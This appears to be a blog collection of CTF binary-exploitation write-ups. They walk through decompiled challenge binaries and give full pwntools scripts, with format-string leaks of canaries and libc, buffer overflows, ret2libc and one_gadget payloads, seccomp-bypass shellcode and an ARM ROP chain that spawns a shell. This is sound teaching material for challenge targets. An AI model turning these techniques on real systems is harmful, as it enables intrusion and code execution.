  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Upon requesting a new ticket, our current ticket ID is incremented by one and the ticket counter is set to that new number. If our ticket ID is 5, then ticketcounter is set to 0. This is crucial to remember for later. After that, our ticketID is printed to us and we give some input. Let’s look at ViewTicket().

void ViewTicket(void) {
  long in_FS_OFFSET;
  int ticket_id;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  ticket_id = 0;
  puts("please enter your ticketID");
  __isoc99_scanf("%d",&ticket_id);
  if (ticket_id == currentticketid) {
    write(1,tickets + (long)ticket_id * 0x20,0x20);
    puts("\n");
  }
  else {
    puts("sorry that is not your ticket!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

At first glance, nothing may look super off. We are prompted to enter the ticket_id we want to view and then the tickets variable is indexed with that ticket_id. The ticket contents are then printed out. The contents are what we enter after we are asked “Please tell me why you are here”.

Let’s look at the functionality of ServiceLogin() before we look at the bug.

void ServiceLogin(void) {
  long in_FS_OFFSET;
  int local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("Admin Password");
  __isoc99_scanf("%d",&local_14);
  if (local_14 != password) {
    puts("Wrong Password");
                    /* WARNING: Subroutine does not return */
    exit(0);
  }
  AdminMenu();
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

We are prompted for an “Admin Password” which is compared to the random number generated in init(). If we are correct, we enter the AdminMenu() function. Let’s look at that now.

void AdminMenu(void) {
  long in_FS_OFFSET;
  int choice;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("========================");
  puts("1. change Admin Password");
  puts("2. reset all Tickets");
  puts("========================");
  choice = 0;
  __isoc99_scanf("%d",&choice);
  getchar();
  if (choice == 1) {
    adminpass();
  }
  else if (choice == 2) {
    puts("Reset done!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Once we are in, we can either change the admin password or reset all tickets (which doesn’t appear to do anything). Let’s have a look in the adminpass() function.

void adminpass(void) {
  long in_FS_OFFSET;
  char new_passwd [4];
  int local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("Enter new Password");
  __isoc99_scanf("%s",new_passwd);
  local_14 = atoi(new_passwd);
  puts("Password changed to");
  printf(new_passwd);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Crucially, we have two vulnerabilities. The first is a buffer overflow; an arbitrary amount of bytes can be read in with scanf() to a buffer that is only 4 bytes big. Second, we have a printf vulnerability which was explained above, but basically we can specify arbitrary format specifiers like %p to leak things off of the stack.

The exploit path is then simple; use the format string vulnerability to leak the canary and a libc pointer, and do a ret2libc attack to a one gadget. A one gadget is an address within libc that once returned to will (normally) use some form of execve to spawn a shell.

But, in order to exploit that we need to give the password which is randomly generated. Enter our bug.

Remember how when the program is first run, wellcome() is called? Note that I did not misspell that, that is how it is in the program :) In there we were told our ticket_id is 0, currentticketid and ticketcounter are set to each other (0 in this case), and we enter in input for “Why we are here” which is stored in the global tickets variable.

The global tickets array is 159 bytes long and the program indexes it in sections of 32 bytes. 159 / 32 ~ 5, meaning that we can store about 5 tickets. This is supported by the check in GrabNewTicket() seen below.

...

  if (5 < (int)currentticketid) {
    ticketcounter = 0;
  }

...

So, after the initial “wellcome” ticket starts at ticket_id 0, we can have a ticket_id of up to 5. So, effectively we can have 6 tickets (0 -> 5). See why that might be a problem? Let’s look at the check within ViewTicket().

if (ticket_id == currentticketid) {
    write(1,tickets + (long)ticket_id * 32,0x20);
    puts("\n");
} 
else {
    puts("sorry that is not your ticket!");
}

Notice how the check is different? It only checks to make sure the ticket_id == currentticketid. So if we create the initial ticket (which we don’t have a choice in making) and it is ticket_id 0, and then create 5 more such that our ticket_id is 5 (1, 2, 3, 4, 5), we can index outside of the global tickets array.

If we look at the following code in ViewTicket()…

if (ticket_id == currentticketid) {
    write(1,tickets + (long)ticket_id * 32,0x20);
    puts("\n");
}
else {
    puts("sorry that is not your ticket!");
}

With a ticket_id of 5, we will write 20 bytes of data to stdout after tickets + 160. And, luckily for us, the seed (which is not used in this challenge but is used in v1) and password are right after the tickets array. So, we can leak the password! Now we have access to not only the admin panel, but also to the crucial vulnerabilities we will need.

See above the global variable layout. The blue arrow is the end of the tickets array and the red arrow is the password value we can leak.

So, now to write the exploit. We’ll use the printf vulnerability to leak the canary and libc using the same methodology mentioned in shelltester-v2 for finding out what x value to specify when doing %{x}$p to get a leak. The python code for doing so is below.

p.sendlineafter(b'here:\n', b'idk')

# Make 5 tickets
for x in range(5):
    p.sendline(b'1')
    p.sendline(b'idk')

# View ticket/leak
p.sendline(b'2')
p.sendline(b'5')

p.recvuntil(b'idk')

# Grab Password
leak = p.recvline()
print(leak[4:12])
password = u64(leak[1:9].ljust(8, b'\x00'))

# Get the canary, at stack offset 7
p.sendline(b'3')
p.sendline(str(password).encode())
p.sendline(b'1')
p.sendline(b'%7$p')
p.recvuntil(b'0x')
canary = int(p.recvline()[:16], 16)
print(f"Canary = {hex(canary)}")

# Get the libc leak (write() + 23)
p.sendline(b'3')
p.sendline(str(password).encode())
p.sendline(b'1')
p.sendline(b'%3$p')
p.recvuntil(b'0x')
libc_write = int(p.recvline()[:12], 16)
libc.address = (libc_write - 23) - libc.symbols.write
print(hex(libc.address))

Now that we’ve got everything, we can send in the final exploit chain. We can use the one_gadget tool on the provided libc to grab the offset of a one_gadget that works and then send in our payload. And voila, we get a shell! Full script is as follows.

from pwn import *
elf = context.binary = ELF("chal_patched")
libc = ELF("libc.so.6")
context.terminal = ['tmux', 'split-window', '-h']
#p = elf.process()
p = remote("ticket-bot-v2.challs.csc.tf", 1337)

p.sendlineafter(b'here:\n', b'idk')

# Make 5 tickets
for x in range(5):
    p.sendline(b'1')
    p.sendline(b'idk')

# View ticket/leak
p.sendline(b'2')
p.sendline(b'5')

p.recvuntil(b'idk')
leak = p.recvline()
password = u64(leak[1:9].ljust(8, b'\x00'))
p.sendline(b'3')
p.sendline(str(password).encode())
p.sendline(b'1')
p.sendline(b'%7$p')

p.recvuntil(b'0x')
canary = int(p.recvline()[:16], 16)
print(f"Canary = {hex(canary)}")

p.sendline(b'3')
p.sendline(str(password).encode())
p.sendline(b'1')
p.sendline(b'%3$p')

p.recvuntil(b'0x')
libc_write = int(p.recvline()[:12], 16)
libc.address = (libc_write - 23) - libc.symbols.write
print(hex(libc.address))
p.sendline(b'3')
p.sendline(str(password).encode())
p.sendline(b'1')

one_gadget = libc.address + 0xe3b01
payload = flat([
    'a' * 8,
    canary,
    'b' * 8,
    one_gadget
])
p.sendline(payload)
p.interactive()

# CSCTF{4rr4ys_4nd_th3re_1nd3x3s_h4ndl3_w1th_c4r3}

A fun challenge! Credit to my teammate @athryx for first spotting a potential vulnerability. It was a bit challenging to get a libc leak as the 4 byte buffer only allowed single digit offsets, %9$p was the highest I could go, but we got the job done.

Things Learned in this CTF

1. There is a such a thing as a ret2dlresolve technique??!
   1. https://ir0nstone.gitbook.io
   2. Basically, we fake an entry in the PLT to trick the program into resolving a symbol of our choosing. Then, we can call that symbol. So, we could trick the PLT into resolving something like system! Cool! This was one of the techniques used on the ezrop challenge
2. There is a such a thing as an openat2 syscall!
   1. I guess when seccomp is a bit too harsh. That was part of the intended solution for menu, which was…
   2. Leak libc with puts(), then use ROP again to mprotect a region as executable, then send in shellcode.
   3. Plus, a cool syscall table website! https://syscalls.mebeim.net/?table=x86/64/x64/latest
   4. Additionally, this challenge used a technique where you could use leftover pointers to leak libc if you didn’t have a pop rdi gadget.
      1. Basically, when printf is called, it leaves a pointer to __funlockfile in rdi when it returns. So you can simply call printf and and then puts to print out that pointer left in rdi. And then you have a libc leak! Apparently this exists in the newer libc versions (>= 2.34). The reasoning behind why this might occur can be seen here in this article https://sashactf.gitbook.io/pwn-notes/pwn/rop-2.34+/ret2gets. Thanks to users in the CyberSpace CTF 2024 discord for discussing this technique!

Syscalls | pwn

This challenge was pretty straightforward. Upon analyzing the binary, we find a main function as seen below.

void main(void) {
  long in_FS_OFFSET;
  undefined buffer [184];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stderr,(char *)0x0,2,0);
  setvbuf(stdin,(char *)0x0,2,0);
  vuln(buffer);
  meat_and_potatoes();
  exec(buffer);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}

Some buffering is set up so that we can interact over nc and then the first notable function, vuln(), is called. This function simply takes in 176 bytes over stdin and places them in buffer. No overflow but as we’ll come to find out later that doesn’t matter.

Next, the aptly named function, mean_and_potatoes(), is called. Inside it, it uses a couple calls to the function prctl() to first set some “capabilities”. I had never seen this function before, so the man pages and the source code in prctl.h helped me figure out what it was doing. Here are some links for reference:

1. https://linux.die.net/man/2/prctl
2. https://github.com/torvalds/linux/blob/master/include/uapi/linux/prctl.h

Below is the bottom bit of the meat_and_potatoes() function.

  prctl(38,1,0,0,0);
  iVar1 = prctl(22,2,local_e8);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return iVar1;
}

The first call to prctl() enables PR_SET_NO_NEW_PRIVS which ensures no elevated privileges are granted to the process. The next call will enable SECCOMP in filter mode. With SECCOMP enabled we will be restricted in what syscalls this program can make. The BPF filter is set up on the stack in the beginning of this function and it took me a bit to figure out what it was at first. The last argument to the second call to prtctl() points to the BPF filter.

Before we dive into what syscalls are filtered lets look at the last notable function called in main(), exec(). This function will simply execute any shellcode placed in buffer which we control. So, our objective will be to write some shellcode that gets around the SECCOMP filters and prints out the flag.

Using the nifty tool seccomp-tools we can turn the SECCOMP BPF filter into something human readable. After dumping the filter, my teammate @athryx helped me analyze it and come up with an exploit. The filter can be seen below.

Looking above we can see that some notable syscalls, read, write, open, execve, exevveat, are banned. Also, writev will block File Descriptors (FDs) below 0x3e8. How unfortunate. Nevertheless, let’s walk through each section of shellcode in the final exploit.

The first bit:

push 1
dec byte ptr [rsp]
mov rax, 0x7478742e67616c66
push rax
push 257
pop rax
mov rsi, rsp
mov rdi, -0x64
xor rdx, rdx
syscall
mov r11, rax

Here, we’ll push the string flag.txt onto the stack, get a stack pointer to it, and eventually place that stack pointer into rsi. We’ll then set up a call to the openat syscall to try and get an open FD to the file flag.txt. openat will open a FD relative to a directory, so we can place the special value -0x64 as the first arg in rdi so that openat will look at the current directory for the file. Then, we’ll place our stack pointer to flag.txt into rsi, set rdx to 0, then place the resultant FD into r11 for use later.

The second bit:

mov rax, 9
mov rdi, 0
mov rsi, 100
mov rdx, 1|2
mov r10, 2
mov r8, r11
mov r9, 0
syscall
mov r10, rax

The second bit will use the mmap syscall to put the contents of flag.txt into an arbitrary section of memory. In rdi we’ll place 0 to indicate we want to mmap an arbitrary section of memory and in rsi we’ll place 100 which is the number of bytes we want to read in (overkill, but whatever). In rdx we’ll make it so the memory page we get is readable and writeable and in r10 we’ll make the mapping private. Finally, the FD will go from r11 into r8 and in r9 we’ll place a 0.

The third bit:

mov rax, 33
mov rdi, 1
mov rsi, 0x3ea
syscall

The third bit we’ll use something super cool called the dup2 syscall. This will let us take one FD and turn it into a different one. Since writev blocks anything below 0x3e8 and stdout is 1, we can simply change stdout to be something else! Cool, right?! We’ll change it to 0x3ea here.

The final bit:

push 100
push r10
mov rdi, 0x3ea
mov rsi, rsp
mov rdx, 1
mov rax, 20
syscall

In the final bit, we’ll first move our new stdout FD into rdi. Since the second arg of writev is a pointer to a struct of type iovec, we’ll need to do some finagling. We can just push the values we want in the struct; 100 for the size to write and the contents of r10, the address of the mmapped flag.txt, onto the stack. rsp is used like a pointer and mimics the struct which is placed in rsi. Finally 1 gets thrown in rdx since we only want to print one buffer.

And that should do it! Once we send this shellcode to the remote server running this challenge we should get the flag printed out! Super fun and interesting challenge. Full solve script below.

from pwn import *

elf = context.binary = ELF("syscalls")
context.terminal = ['tmux', 'split-window', '-h']
p = remote("syscalls.chal.uiuc.tf", 1337, ssl=True)

shellcode = '''
push 1
dec byte ptr [rsp]
mov rax, 0x7478742e67616c66
push rax
push 257
pop rax
mov rsi, rsp
mov rdi, -0x64
xor rdx, rdx
syscall
mov r11, rax

mov rax, 9
mov rdi, 0
mov rsi, 100
mov rdx, 1|2
mov r10, 2
mov r8, r11
mov r9, 0
syscall
mov r10, rax

mov rax, 33
mov rdi, 1
mov rsi, 0x3ea
syscall

push 100
push r10
mov rdi, 0x3ea
mov rsi, rsp
mov rdx, 1
mov rax, 20
syscall
'''

p.sendline(asm(shellcode))
p.interactive()

# uiuctf{a532aaf9aaed1fa5906de364a1162e0833c57a0246ab9ffc}

shall-we-play-a-game | pwn

This challenge was inspired by the classic hacker movie War Games. Movies are a part of the reason I became interested in the computing field and I hoped to share that with participants. As such, this challenge was beginner focused, as everyone deserves a chance to pwn something during a CTF :)

To start, users are given a challenge binary, chal and the Dockerfile (however this really isn’t needed, it doesn’t depend on a libc or anything). Let’s have a look at what the challenge looks like in ghidra.

Here are the contents of main()

undefined8 main(void) {
  char local_b8 [48];
  char local_88 [48];
  char local_58 [16];
  char local_48 [64];
  
  setbuf(stdout,(char *)0x0);
  puts("GREETINGS PROFESSOR FALKEN.");
  fgets(local_58,0x13,stdin);
  puts("HOW ARE YOU FEELING TODAY?");
  fgets(local_88,0x23,stdin);
  puts(
      "EXCELLENT. IT\'S BEEN A LONG TIME. CAN YOU EXPLAIN THE\nREMOVAL OF YOUR USER ACCOUNT ON 6/23/ 73?"
      );
  fgets(local_b8,0x23,stdin);
  puts("SHALL WE PLAY A GAME?");
  fgets(local_48,0x56,stdin);
  return 0;
}

So we can see it trys to emulate the behavior of the computer that David Lightman (Matthew Broderick) hacks. Within the first few prompts there doesn’t seem to be a problem. However, when asked “SHALL WE PLAY A GAME”, the call to fgets() takes in way more input that necessary. It stands to reason that we can gain control of the instruction pointer, rip, because there is no canary and PIE is not enabled.

To demonstrate this, we can open the program in pwndbg and use the cyclic command to generate a long string and calculate how many chars we will need to gain control.

As we can see, we segfault trying to return to jaaaaaaa, or 0x616161616161616a. And using cyclic -l jaaaaaaa we can see that we have an offset of 72 bytes until rip. Now, where to go from here? Examining the rest of the binary we can see that there is a function called global_thermo_nuclear_war(), yet another movie reference.

void global_thermo_nuclear_war(void) {
  char local_118 [264];
  FILE *local_10;
  
  local_10 = fopen("flag.txt","r");
  if (local_10 == (FILE *)0x0) {
    puts("flag.txt not found");
  }
  else {
    fgets(local_118,0x100,local_10);
    puts(local_118);
  }
  return;
}

This function appears to print the flag out to us if we can call it. And with control of rip this is possible. We’ll have to write a python script with pwntools to send in 72 bytes of junk and then the address of global_thermo_nuclear_war(). The script to do so is below. Hope you enjoyed!

from pwn import *

elf = context.binary = ELF('chal');
#p = elf.process()
p = remote('gold.b01le.rs', 4004)

context.terminal = ['tmux', 'split-window', '-h']
gdb_script = '''
init-pwndbg
break *main
'''
#gdb.attach(p, gdb_script)
offset = 72
payload = flat([
    'a' * offset,
    elf.symbols['global_thermo_nuclear_war']
])

p.sendlineafter(b'FALKEN', b'Hello.')
p.sendlineafter(b'TODAY?\n', b'Pretty good')
p.sendlineafter(b'/73?\n', b'People make mistakes')

p.sendlineafter(b'GAME?\n', payload)

p.interactive()

seeing-red | pwn

Inspired by one of my favorite Taylor Swift songs, seeing-red is another easy-medium pwn challenge. I wanted to combine a ret2win style challenge with a format string exploit. The goal here was not to get shell even though it seems some people did, this was not my intention.

To start, we again distribute the challenge binary and a Dockerfile. The Dockerfile is again not needed here, just included for convenience. Let’s throw the challenge in ghidra and have a look at the main() function.

undefined8 main(void) {
  setbuf(stdout,(char *)0x0);
  help_me();
  printf("sooo... anyways whats your favorite Taylor Swift song? ");
  fflush(stdout);
  read(0,song,200);
  printf("Ooohh! ");
  printf(song);
  puts("Thats a good one!");
  return 0;
}

Looks like it first calls the help_me() function, so lets take a look at that.

undefined8 help_me(void) {
  char local_48 [64];
  
  puts("I was going to go to the eras tour, but something came up :(");
  puts("You can have my ticket! Only thing is... I forgot where I put it...");
  puts("Do you know where it could be?! ");
  fgets(local_48,100,stdin);
  fflush(stdin);
  return 0;
}

Wow, they can’t go AND lost their ticket? How tragic. Anyway, looks like we’ve got a buffer overflow so thats a plus! But where to go? Looking elsewhere in the binary, there is a function called use_ticket() that we can maybe leverage.

void use_ticket(void *param_1) {
  FILE *__stream;
  size_t sVar1;
  
  __stream = fopen("flag.txt","r");
  if (__stream == (FILE *)0x0) {
    printf("flag.txt not found");
  }
  else {
    sVar1 = fread(param_1,1,0x27,__stream);
    *(undefined *)((long)param_1 + (long)(int)sVar1) = 0;
  }
  return;
}

It looks like flag.txt is being read into a global buffer. But how is this helpful, it doesn’t even print it back out? If we go back to main, there is another vulnerability in the form of a format string exploit. When we are asked what our favorite taylor swift song is, it is printed back out to us. So, we can leak things off the stack. See where I’m going?

If we can overflow the buffer, return to use_ticket() then a buffer containing the contents of flag.txt is on the stack. Then we can ensure we go back to main() where we can use the printf() vuln to leak the string out of that buffer on the stack with %s. To do that, we’ve gotta find a few things. One, the offset to rip so we can return to use_ticket() and the offset on the stack at which the flag.txt buffer is so we can leak it off the stack.

First, let’s take a look at how we can control rip. We’ll use the same methodology in the above challenge; generating a De Bruijn sequence and seeing how many chars are needed for the overflow.

Looks like we’ve got an offset of 72 chars before we control rip. Using this we can start writing an exploit.

from pwn import *

elf = context.binary = ELF("chal")
context.terminal = ['tmux', 'split-window', '-h']
#p = elf.process()

gdb_script = '''
init-pwndbg
'''
#gdb.attach(p, gdb_script)

offset = 72
payload = flat([
    'a' * offset,
    elf.symbols['use_ticket']
])

p.sendline(payload)
p.interactive()

The above script will let us crash the buffer and return to use_ticket(). So where to next? Well, we’ve gotta continue execution flow to main() to take advantage of the printf() vuln. To do this, we can use pwndbg to find an address in main() to return to.

Looks like 0x000000000040131f is a good address to return to as it is just after the call to the help_me() function. So, now that we’ve gotten back to main, we can continue program execution until the printf() vuln which comes after we are asked for our favorite Taylor Swift song. But, how do we leak the flag? Well since there is no format specifier provided when our input is printed back out to us (see the main() code above) we can provide our own. For instance, we can provide %s to arbitrarily print a string off the stack. We can take it further and use the %<offset>$p notation to leak at specific stack offsets. For instance, we can leak the 3rd offset with %3$p.

Let’s inspect the stack before that printf is called to see what offset we need to leak. Remember, the global buffer is left on the stack from the previous function.

Above we can see that after use_ticket() is called our flag is read into a buffer, in this case 0x2167490.

Now, we are right at the printf() function in main where our input is about to be printed out. With the command x/-40gx $rsp we can print the values on the stack relative to the stack pointer. Note that the -40gx prints the values on the previous stack frames. Notice the red rectangle is our flag buffer. The green rectangle is the first offset, so what you get if you were to send in %1$p. From that we can calculate that we’ll need to do %5$s to print the string at the fifth offset, which is the flag buffer.

And that should do it! Below is the final script and resulting output.

from pwn import *

elf = context.binary = ELF("chal")
context.terminal = ['tmux', 'split-window', '-h']
#p = elf.process()
p = remote('gold.b01le.rs', 4008)

gdb_script = '''
init-pwndbg
'''
#gdb.attach(p, gdb_script)

offset = 72
main_offset = 0x000000000040131f
ret = 0x000000000040101a
bruh = 0x00000000004012af
payload = flat([
    'a' * 64,
    'b' * 8,
    elf.symbols['use_ticket'],
    ret,
    main_offset
])

p.sendline(payload)
#p.sendlineafter(b'song?', "%1$p")
p.sendlineafter(b'song? ', b'%5$s')
p.interactive()

Note that there is an extra ret instruction in the exploit chain for stack alignment purposes.

And we get the flag!

arm-and-a-leg | pwn

This challenge was inspired by MITRE’s eCTF as it had me learn ARM assembly. Also I think mixing the ARM architecture with a pun about something costing “an arm and a leg” is funny. I find it really interesting as ARM is a RISC architecture, which is different than x86 which is what i started with. The goal of this challenge was to leverage some fun ROP gadgets to load x0 with a pointer to /bin/sh and call system. However, it looks like people manually found one_gadgets in the appropriate libc. I didn’t intend this and in my opinion it isn’t as fun, but hey, whatever gets the job done, right?

Let’s start by looking at the main function in ghidra.

undefined8 main(void) {
  int iVar1;
  int local_c;
  long local_8;
  
  local_8 = __stack_chk_guard;
  setup(&__stack_chk_guard,0);
  iVar1 = puts(
              "Hello! \nWelcome to ARMs and Legs, here for all of your literal and metaphorical need s!");
  print_menu(iVar1);
  __isoc99_scanf(&DAT_00400d08,&local_c);
  if (local_c == 1) {
    iVar1 = puts(
                "So, you\'d like to purchase an ARM...are you worthy enough to purchase such an appe ndage?");
    iVar1 = worthyness_tester(iVar1);
    if (iVar1 == 0) {
      get_address();
      feedback();
    }
    else {
      puts("Close, but no cigar. Maybe try a Leg?");
    }
  }
  else if (local_c == 2) {
    iVar1 = puts(
                "So, you\'d like to purchase a Leg...are you worthy enough to purchase such an appen dage?!");
    iVar1 = worthyness_tester(iVar1);
    if (iVar1 == 0) {
      get_address();
      feedback();
    }
    else {
      puts("Close, but no cigar. Maybe try an ARM?");
    }
  }
  if (local_8 - __stack_chk_guard == 0) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail(&__stack_chk_guard,0,0,local_8 - __stack_chk_guard);
}

First, it appears as though we can make two choices; to purchase either an ARM or leg. No matter what we choose, if worthyness_tester() returns 0, two more functions (get_address(), and feedback()) are called, or else we exit. Let’s have a look inside the worthyness_test() function and see how we can get it to return 0.

bool worthyness_tester(void) {
  bool bVar1;
  int local_10;
  int local_c;
  long local_8;
  
  local_8 = __stack_chk_guard;
  puts("What number am I thinking of?");
  local_c = 0x539;
  __isoc99_scanf(&DAT_00400d08,&local_10);
  bVar1 = local_c != local_10;
  if (!bVar1) {
    printf("Wow, you may now purchase an appendage!");
  }
  if (local_8 - __stack_chk_guard == 0) {
    return bVar1;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail(&__stack_chk_guard,bVar1,0,local_8 - __stack_chk_guard);
}

Looks like in order for the function to return 0, we’ve gotta input the correct number the program is thinking of. I hardcoded it to be 1337, which above is represented in hex as 0x539. So, when prompted, we just have to enter that.

In all honesty I was gonna make a function that computed a random number that could be fun to reverse, but I was waiting to implement it till I got an exploit working. Then when I went to implement it my exploit didn’t work and I didn’t want to rewrite everything. Plus I figured that’d just add an extra unnecessary step.

Next we’ll look at the first function that runs after we guess the “random” number successfully which is get_address().

void get_address(void) {
  int iVar1;
  char acStack48 [40];
  long local_8;
  
  local_8 = __stack_chk_guard;
  printf("\tCould we have an address to ship said appendage? ",0);
  __isoc99_scanf(&DAT_00400ea0,acStack48);
  printf("\nThanks, we will ship to: ");
  printf(acStack48);
  iVar1 = putchar(10);
  clear_buffer(iVar1);
  if (local_8 - __stack_chk_guard != 0) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(&__stack_chk_guard,0,local_8 - __stack_chk_guard);
  }
  return;
}

Upon successful purchase of an appendage, it looks like we have to give an address to ship it. If you’ll notice, once we give an input, our “address” is printed back out to us with printf(), again with no format specifier!

Yes, I like printf() exploits.

Anyway, we can use this to leak values off the stack. We’ll need leaks for libc and for the canary. So, lets build the start of an exploit script and see if we can’t find some useful addresses.

from pwn import *

context.terminal = ['tmux', 'split-window', '-h']

elf = context.binary = ELF('chalarm')
libc = ELF('libc.so.6')
ld = ELF('ld-linux-aarch64.so.1')

#p = process('qemu-aarch64 -g 1234 chal'.split())
#p = process('qemu-aarch64 chal'.split())

p = remote('arm-and-a-leg.gold.b01le.rs', 1337)

p.sendlineafter(b'2. Legs\n', b'1')
p.sendlineafter(b'of?\n', b'1337')
# These are leaks for chal with pie
p.sendlineafter(b'appendage? ', b'%21$p%19$p')

p.recv()
leaks = p.recv().split(b'0x')
# libc_start_main + 152 is at the 21st offset MAKE SURE TO SUBTRACT 152 FROM THE LEAK
libc_start_main_leak = leaks[1]
libc_start_main = int(libc_start_main_leak, 16) - 152

# Canary at 19th offset
canaryleak = leaks[2].split(b'\n')[0]
canary = int(canaryleak, 16)

libc.address = libc_start_main - libc.symbols['__libc_start_main']

Above we set up some basic pwntools functionality and then send that 1337 value to satisfy the worthynes_tester(). After that, we send in our printf() payload to start leaking stuff off the stack. Thenm we parse our leaks, which end up being the __libc_start_main() + 152 and the canary. We also calculate the base of libc, with the libc that can be extracted from the docker container. Let’s have a look in GDB so that you can get a clearer picture of why we chose the printf() offsets of %21$p and %19$p.

The dark blue rectangle (1st one down) is the 19th offset and is the canary and the light blue rectangle (2nd one down) is the address of __libc_start_main() + 152 which is the 21st offset. Now that we have these leaks, what can we do? Well, we’ll have to return to system within libc and use that to get a shell.

To do this, I embedded some gadgets within the challenge to make this fun. The main thing is getting x0 to contain a pointer to /bin/sh.

The first thing we’ll have to do is overflow the buffer in the feedback() function seen below; we are asked for some feedback after we provide our address.

void feedback(void) {
  char acStack112 [104];
  long local_8;
  
  local_8 = __stack_chk_guard;
  puts("Care to leave some feedback?!");
  fgets(acStack112,0x100,stdin);
  puts("Thanks!");
  if (local_8 - __stack_chk_guard != 0) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(&__stack_chk_guard,0,local_8 - __stack_chk_guard);
  }
  return;
}

But before we overflow anything, let’s take a look at the stack before the overflow so we can get a feel for what it looks like it. This is the instruction right before the call to fgets. Notice the address 0x550080060 is marked as in x0. This would be the input buffer as x0 denotes the first arg of fgets which is said input buffer.

In order to fill up all 104 chars, we’ll need to send in 104 chars of junk. And then, we’ll need the canary so as to not trip that protection. We leaked it prior, so we can send it back in. Then we’ll need 8 bytes for the “base pointer” and then we can place our first gadget. Below is a view of the stack right after the ROP chain is sent in.

I guess I should explain the intended solve before we go any further.

Let’s keep in mind that we need to populate x0 with a pointer to /bin/sh. Also keep in mind that in ARM, the return address of the current function is stored within the Link Register (x30) which is before our input on the stack. So, we are overflowing the return address of main(). I had a lot of fun writing this ROP chain.

The first gadget we’ll start with is mov x2, sp; ldp x29, x30, [sp], #0x10; ret. Here, we’ll save the current stack pointer (we’ll need it later) into x2 then load a pair of values relative to the stack pointer into x29 and x30, respectively, then return. x29 is the base pointer and x30 is the place where the return address is stored; so, we’ll be heading to the value there next.

So, the 8 chars of junk will be popped into x29 and we’ll head to our next gadget, ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret; Here we are loading into x19 the value on the stack at sp + 0x10. After which we pop values off the stack into x29 and x30 and increment the SP by 0x20. This serves no purpose other than I was working on a different exploit chain and removing this part kept breaking the current ROP chain. But, we get our next gadget into x30 and that is where will will continue the ROP chain.

Here is the payload so far:

payload = flat([
    'a' * 104, # Junk
    canary, # Account for the canary
    'b' * 8, # Account for base pointer
    mov_x2_sp, # Saving SP into x2
    'c' * 8, # More Junk for x29
    canary,  # Another Canary
    'd' * 8, # More Junk
    ldr_x19 #  Next junk gadget, explained above
])

The final gadget we’ll use is ldr x0, [x2, #0x10]; ldp x29, x30, [sp], #0x10; ret. Here we’ll use what we set up in the first gadget. This gadget will load the value at x2, which is the SP, plus 0x10 which we can have be a stack address of /bin/sh if we send the string in the exploit chain correctly! Then, just like we’ve been doing we’ll load a base pointer and return. Here is the exploit so far.

payload = flat([
    'a' * 104,
    canary,
    'b' * 8,
    mov_x2_sp,
    'c' * 8,
    canary,
    'd' * 8,
    ldr_x19,
    binsh,
    ldr_x0_x2,
])

With this we can save the stack pointer, then load a stack address relative of it which can be /bin/sh. Pretty cool huh? Next, all we’ve gotta do is call system. Its going to be on the stack with the rest of the ROP chain, but to understand where let’s have a look at the ROP chain on the stack before the first gadget is executed.

Notice the green rectangle is where we put system, then the at the blue rectangle we’ve got a bunch of junk chars, in this case e. Why the junk characters? Well, the ROP gadget we used above, ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;, incremented the stack pointer by 0x20. Below we can see what the stack looks like before the last part of that gadget is executed.

Notice the stack pointer is much lower, and we needed to send in those junk characters to account for it’s aforementioned increase. We needed system to be able to be loaded into x30. Below is an image of the stack before the ldp x29, x30, [sp], #0x10; ret portion of the last ROP gadget is executed. As you can see, the junk worked because the last bit of the e chars will be loaded into x29 and the address of system will be successfully loaded into x30.

Now we sit back, relax, and watch as a glorious shell is spawned.

A few notes on this chal

This challenge was deployed using a redpwn jail which is built upon nsjail. In short, this system will mount the filesystem of an ARM docker container inside the x86-64 based redpwn container. On my local Ubuntu x86-64 VM this worked fine as long as qemu was installed. However, I noticed that ASLR was disabled. This is no fun for CTFs. Additionally, when a shell was spawned inside the container running on an x86-64 host, the nsjail and qemu combo did not like that. As such, I migrated this deployment to an ARM based VM. The layout of the binary and offsets are the same, however ASLR was enabled and users could spawn a shell with system.

The source for these challenges is located here and source for other challenges will be located on the b01lers github.

See ya next year.

aplet123 | pwn | 251 Solves

To start, we are given the source of the challenge, aplet123.c, the challenge executable, aplet123, and a Dockerfile. Both challenges I solved in this CTF included source, which left my empty ghidra workspace feeling especially lonely. Nonetheless, when we crack the source open we are greeted by some standard header files, and whoah whats that? A print_flag() function?? Well I guess we know what were trying to call. Moving further down there is an array of responses which I’ll assume are printed out to the user upon further interaction with the program.

